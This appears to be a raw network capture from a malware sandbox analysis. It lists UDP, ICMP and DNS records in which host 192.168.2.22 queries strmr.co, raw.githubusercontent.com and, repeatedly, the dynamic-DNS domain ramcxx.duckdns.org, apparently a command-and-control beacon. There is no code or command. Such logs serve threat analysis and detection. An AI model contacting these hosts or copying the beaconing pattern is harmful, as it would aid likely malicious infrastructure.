                                                                                                      Sep 27, 2024 12:54:31.122487068 CEST5634553192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:31.129399061 CEST53563458.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:31.130450964 CEST5634553192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:31.923355103 CEST53518288.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:33.136409044 CEST5634553192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:33.143549919 CEST53563458.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:33.143716097 CEST5634553192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:33.751483917 CEST53518288.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:36.137023926 CEST53563458.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:37.150149107 CEST5187053192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:38.150319099 CEST53563458.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:38.159568071 CEST5187053192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:39.173758984 CEST5187053192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:41.186692953 CEST5187053192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:45.195664883 CEST5187053192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:50.229626894 CEST6500953192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:51.232441902 CEST6500953192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:52.246438026 CEST6500953192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:54.258888960 CEST6500953192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:58.268059015 CEST6500953192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:55:03.301217079 CEST6495653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:55:04.305310965 CEST6495653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:55:04.344568014 CEST53649568.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:55:04.344793081 CEST6495653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:55:06.350426912 CEST6495653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:55:10.362447977 CEST6495653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:55:15.390448093 CEST5452153192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:55:16.395597935 CEST5452153192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:55:17.409342051 CEST5452153192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:55:19.421729088 CEST5452153192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:55:22.506052017 CEST53545218.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:55:23.579483986 CEST4975053192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:55:24.585375071 CEST4975053192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:55:25.599361897 CEST4975053192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:55:27.614471912 CEST4975053192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:55:31.628994942 CEST4975053192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:55:36.654397011 CEST6468753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:55:37.658185005 CEST6468753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:55:38.672278881 CEST6468753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:55:40.684618950 CEST6468753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:55:44.695904016 CEST6468753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:55:49.722269058 CEST6508453192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:55:50.731075048 CEST6508453192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:55:51.745053053 CEST6508453192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:55:52.885914087 CEST53650848.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:55:52.888044119 CEST6508453192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:55:56.893054008 CEST6508453192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:56:02.271735907 CEST6337353192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:56:03.273533106 CEST6337353192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:56:04.287553072 CEST6337353192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:56:06.320796967 CEST6337353192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:56:10.324693918 CEST6337353192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:56:15.357745886 CEST5620753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:56:16.362016916 CEST5620753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:56:17.376002073 CEST5620753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:56:19.388431072 CEST5620753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:56:23.397835016 CEST5620753192.168.2.228.8.8.8
                                                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                                                      Sep 27, 2024 12:52:02.688498974 CEST192.168.2.228.8.8.8d008(Port unreachable)Destination Unreachable
                                                                                                      Sep 27, 2024 12:52:03.702661037 CEST192.168.2.228.8.8.8d008(Port unreachable)Destination Unreachable
                                                                                                      Sep 27, 2024 12:52:08.709742069 CEST192.168.2.228.8.8.8d008(Port unreachable)Destination Unreachable
                                                                                                      Sep 27, 2024 12:52:09.724222898 CEST192.168.2.228.8.8.8d008(Port unreachable)Destination Unreachable
                                                                                                      Sep 27, 2024 12:52:11.762701035 CEST192.168.2.228.8.8.8d008(Port unreachable)Destination Unreachable
                                                                                                      Sep 27, 2024 12:52:36.826739073 CEST192.168.2.228.8.8.8d018(Port unreachable)Destination Unreachable
                                                                                                      Sep 27, 2024 12:52:38.740149975 CEST192.168.2.228.8.8.8d008(Port unreachable)Destination Unreachable
                                                                                                      Sep 27, 2024 12:52:40.752141953 CEST192.168.2.228.8.8.8d008(Port unreachable)Destination Unreachable
                                                                                                      Sep 27, 2024 12:53:08.634224892 CEST192.168.2.228.8.8.8d008(Port unreachable)Destination Unreachable
                                                                                                      Sep 27, 2024 12:53:10.390285015 CEST192.168.2.228.8.8.8d008(Port unreachable)Destination Unreachable
                                                                                                      Sep 27, 2024 12:53:13.435060978 CEST192.168.2.228.8.8.8d008(Port unreachable)Destination Unreachable
                                                                                                      Sep 27, 2024 12:53:17.430115938 CEST192.168.2.228.8.8.8d008(Port unreachable)Destination Unreachable
                                                                                                      Sep 27, 2024 12:53:18.689627886 CEST192.168.2.228.8.8.8d008(Port unreachable)Destination Unreachable
                                                                                                      Sep 27, 2024 12:53:26.313416958 CEST192.168.2.228.8.8.8d008(Port unreachable)Destination Unreachable
                                                                                                      Sep 27, 2024 12:53:27.099437952 CEST192.168.2.228.8.8.8d018(Port unreachable)Destination Unreachable
                                                                                                      Sep 27, 2024 12:53:35.713433981 CEST192.168.2.228.8.8.8d008(Port unreachable)Destination Unreachable
                                                                                                      Sep 27, 2024 12:53:37.734632969 CEST192.168.2.228.8.8.8d008(Port unreachable)Destination Unreachable
                                                                                                      Sep 27, 2024 12:53:40.830323935 CEST192.168.2.228.8.8.8d008(Port unreachable)Destination Unreachable
                                                                                                      Sep 27, 2024 12:53:41.861545086 CEST192.168.2.228.8.8.8d008(Port unreachable)Destination Unreachable
                                                                                                      Sep 27, 2024 12:53:47.304734945 CEST192.168.2.228.8.8.8d018(Port unreachable)Destination Unreachable
                                                                                                      Sep 27, 2024 12:53:50.034317017 CEST192.168.2.228.8.8.8d008(Port unreachable)Destination Unreachable
                                                                                                      Sep 27, 2024 12:53:53.939749956 CEST192.168.2.228.8.8.8d008(Port unreachable)Destination Unreachable
                                                                                                      Sep 27, 2024 12:53:56.351941109 CEST192.168.2.228.8.8.8d018(Port unreachable)Destination Unreachable
                                                                                                      Sep 27, 2024 12:54:31.923435926 CEST192.168.2.228.8.8.8d008(Port unreachable)Destination Unreachable
                                                                                                      Sep 27, 2024 12:54:33.754393101 CEST192.168.2.228.8.8.8d008(Port unreachable)Destination Unreachable
                                                                                                      Sep 27, 2024 12:54:38.150388956 CEST192.168.2.228.8.8.8d008(Port unreachable)Destination Unreachable
                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Sep 27, 2024 12:51:31.103806019 CEST192.168.2.228.8.8.80x2e9dStandard query (0)strmr.coA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:33.760612965 CEST192.168.2.228.8.8.80xe9ddStandard query (0)strmr.coA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:35.515815020 CEST192.168.2.228.8.8.80x1803Standard query (0)strmr.coA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:35.530850887 CEST192.168.2.228.8.8.80x9f72Standard query (0)strmr.coA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:39.588354111 CEST192.168.2.228.8.8.80xc083Standard query (0)strmr.coA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:39.597053051 CEST192.168.2.228.8.8.80x1100Standard query (0)strmr.coA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:40.912826061 CEST192.168.2.228.8.8.80xb6ecStandard query (0)strmr.coA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:40.935252905 CEST192.168.2.228.8.8.80xd97eStandard query (0)strmr.coA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:50.204842091 CEST192.168.2.228.8.8.80xbf08Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:56.682825089 CEST192.168.2.228.8.8.80x52fStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:57.681818008 CEST192.168.2.228.8.8.80x52fStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:58.695801973 CEST192.168.2.228.8.8.80x52fStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:52:00.708497047 CEST192.168.2.228.8.8.80x52fStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:52:02.694823980 CEST192.168.2.228.8.8.80x4a17Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:52:03.703469038 CEST192.168.2.228.8.8.80x4a17Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:52:04.717514038 CEST192.168.2.228.8.8.80x4a17Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:52:06.731138945 CEST192.168.2.228.8.8.80x4a17Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:52:09.100706100 CEST192.168.2.228.8.8.80x63c2Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:52:31.719338894 CEST192.168.2.228.8.8.80x1d64Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:52:32.721080065 CEST192.168.2.228.8.8.80x1d64Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:52:33.733685970 CEST192.168.2.228.8.8.80x1d64Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:52:35.745956898 CEST192.168.2.228.8.8.80x1d64Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:52:37.745115042 CEST192.168.2.228.8.8.80xbd0cStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:00.170618057 CEST192.168.2.228.8.8.80xf858Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:00.368963003 CEST192.168.2.228.8.8.80xf858Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:01.377011061 CEST192.168.2.228.8.8.80xf858Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:03.389255047 CEST192.168.2.228.8.8.80xf858Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:05.380410910 CEST192.168.2.228.8.8.80xf858Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:07.410631895 CEST192.168.2.228.8.8.80xe15cStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:08.412539005 CEST192.168.2.228.8.8.80xe15cStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:08.419467926 CEST192.168.2.228.8.8.80xe15cStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:08.426665068 CEST192.168.2.228.8.8.80xe15cStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:12.421672106 CEST192.168.2.228.8.8.80xe15cStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:13.445568085 CEST192.168.2.228.8.8.80xc5d3Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:13.615322113 CEST192.168.2.228.8.8.80xc5d3Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:14.632747889 CEST192.168.2.228.8.8.80xc5d3Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:16.633691072 CEST192.168.2.228.8.8.80xc5d3Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:16.782390118 CEST192.168.2.228.8.8.80xc5d3Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:17.864708900 CEST192.168.2.228.8.8.80x3de4Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:17.881176949 CEST192.168.2.228.8.8.80x3de4Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:17.973742008 CEST192.168.2.228.8.8.80x3de4Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:17.984872103 CEST192.168.2.228.8.8.80x3de4Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:17.991961956 CEST192.168.2.228.8.8.80x3de4Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:19.014983892 CEST192.168.2.228.8.8.80xb50eStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:19.089282036 CEST192.168.2.228.8.8.80xb50eStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:19.099222898 CEST192.168.2.228.8.8.80xb50eStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:19.106216908 CEST192.168.2.228.8.8.80xb50eStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:19.119349957 CEST192.168.2.228.8.8.80xb50eStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:20.156239986 CEST192.168.2.228.8.8.80x7cdcStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:21.157814026 CEST192.168.2.228.8.8.80x7cdcStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:21.254931927 CEST192.168.2.228.8.8.80x7cdcStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:21.262566090 CEST192.168.2.228.8.8.80x7cdcStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:25.260504007 CEST192.168.2.228.8.8.80x7cdcStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:27.045352936 CEST192.168.2.228.8.8.80xe5b3Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:27.105776072 CEST192.168.2.228.8.8.80xe5b3Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:27.122139931 CEST192.168.2.228.8.8.80xe5b3Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:27.130896091 CEST192.168.2.228.8.8.80xe5b3Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:27.138268948 CEST192.168.2.228.8.8.80xe5b3Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:28.156682968 CEST192.168.2.228.8.8.80xe41Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:28.576432943 CEST192.168.2.228.8.8.80xe41Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:28.611727953 CEST192.168.2.228.8.8.80xe41Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:28.620433092 CEST192.168.2.228.8.8.80xe41Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:28.628386974 CEST192.168.2.228.8.8.80xe41Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:29.654067993 CEST192.168.2.228.8.8.80xc01dStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:30.668418884 CEST192.168.2.228.8.8.80xc01dStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:30.703072071 CEST192.168.2.228.8.8.80xc01dStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:32.705634117 CEST192.168.2.228.8.8.80xc01dStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:32.728193998 CEST192.168.2.228.8.8.80xc01dStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:35.822860956 CEST192.168.2.228.8.8.80xfd5aStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:36.847718000 CEST192.168.2.228.8.8.80xfd5aStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:36.854953051 CEST192.168.2.228.8.8.80xfd5aStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:38.863867044 CEST192.168.2.228.8.8.80xfd5aStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:38.871081114 CEST192.168.2.228.8.8.80xfd5aStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:39.883455038 CEST192.168.2.228.8.8.80xd3ccStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:39.890722036 CEST192.168.2.228.8.8.80xd3ccStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:39.898230076 CEST192.168.2.228.8.8.80xd3ccStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:39.905344009 CEST192.168.2.228.8.8.80xd3ccStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:39.917277098 CEST192.168.2.228.8.8.80xd3ccStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:40.971227884 CEST192.168.2.228.8.8.80xe95bStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:41.996819973 CEST192.168.2.228.8.8.80xe95bStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:43.026762009 CEST192.168.2.228.8.8.80xe95bStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:45.025789976 CEST192.168.2.228.8.8.80xe95bStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:46.200613976 CEST192.168.2.228.8.8.80xe95bStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:48.015567064 CEST192.168.2.228.8.8.80x1d05Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:49.019390106 CEST192.168.2.228.8.8.80x1d05Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:49.425901890 CEST192.168.2.228.8.8.80x1d05Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:49.432832003 CEST192.168.2.228.8.8.80x1d05Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:52.537313938 CEST192.168.2.228.8.8.80x1d05Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:53.553610086 CEST192.168.2.228.8.8.80xf155Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:54.032134056 CEST192.168.2.228.8.8.80xf155Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:54.039829969 CEST192.168.2.228.8.8.80xf155Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:54.048264980 CEST192.168.2.228.8.8.80xf155Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:54.055615902 CEST192.168.2.228.8.8.80xf155Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:55.254973888 CEST192.168.2.228.8.8.80xd268Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:56.257906914 CEST192.168.2.228.8.8.80xd268Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:56.264853001 CEST192.168.2.228.8.8.80xd268Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:56.271974087 CEST192.168.2.228.8.8.80xd268Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:56.278548002 CEST192.168.2.228.8.8.80xd268Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:57.292988062 CEST192.168.2.228.8.8.80xbd41Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:57.302481890 CEST192.168.2.228.8.8.80xbd41Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:57.314451933 CEST192.168.2.228.8.8.80xbd41Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:57.327419043 CEST192.168.2.228.8.8.80xbd41Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:57.338381052 CEST192.168.2.228.8.8.80xbd41Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:58.354511976 CEST192.168.2.228.8.8.80x2ce0Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:58.362325907 CEST192.168.2.228.8.8.80x2ce0Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:58.369890928 CEST192.168.2.228.8.8.80x2ce0Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:58.376998901 CEST192.168.2.228.8.8.80x2ce0Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:58.383708000 CEST192.168.2.228.8.8.80x2ce0Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:59.402847052 CEST192.168.2.228.8.8.80xc1d6Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:59.410008907 CEST192.168.2.228.8.8.80xc1d6Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:59.416981936 CEST192.168.2.228.8.8.80xc1d6Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:59.423688889 CEST192.168.2.228.8.8.80xc1d6Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:59.430968046 CEST192.168.2.228.8.8.80xc1d6Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:00.448559046 CEST192.168.2.228.8.8.80xefbStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:00.586544037 CEST192.168.2.228.8.8.80xefbStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:00.594464064 CEST192.168.2.228.8.8.80xefbStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:00.602626085 CEST192.168.2.228.8.8.80xefbStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:00.610601902 CEST192.168.2.228.8.8.80xefbStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:01.697026968 CEST192.168.2.228.8.8.80x1b9fStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:01.706152916 CEST192.168.2.228.8.8.80x1b9fStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:01.726037025 CEST192.168.2.228.8.8.80x1b9fStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:01.734406948 CEST192.168.2.228.8.8.80x1b9fStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:24.176172972 CEST192.168.2.228.8.8.80x6c2Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:24.221484900 CEST192.168.2.228.8.8.80x6c2Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:24.230211973 CEST192.168.2.228.8.8.80x6c2Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:24.241676092 CEST192.168.2.228.8.8.80x6c2Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:24.253168106 CEST192.168.2.228.8.8.80x6c2Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:25.286578894 CEST192.168.2.228.8.8.80xf731Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
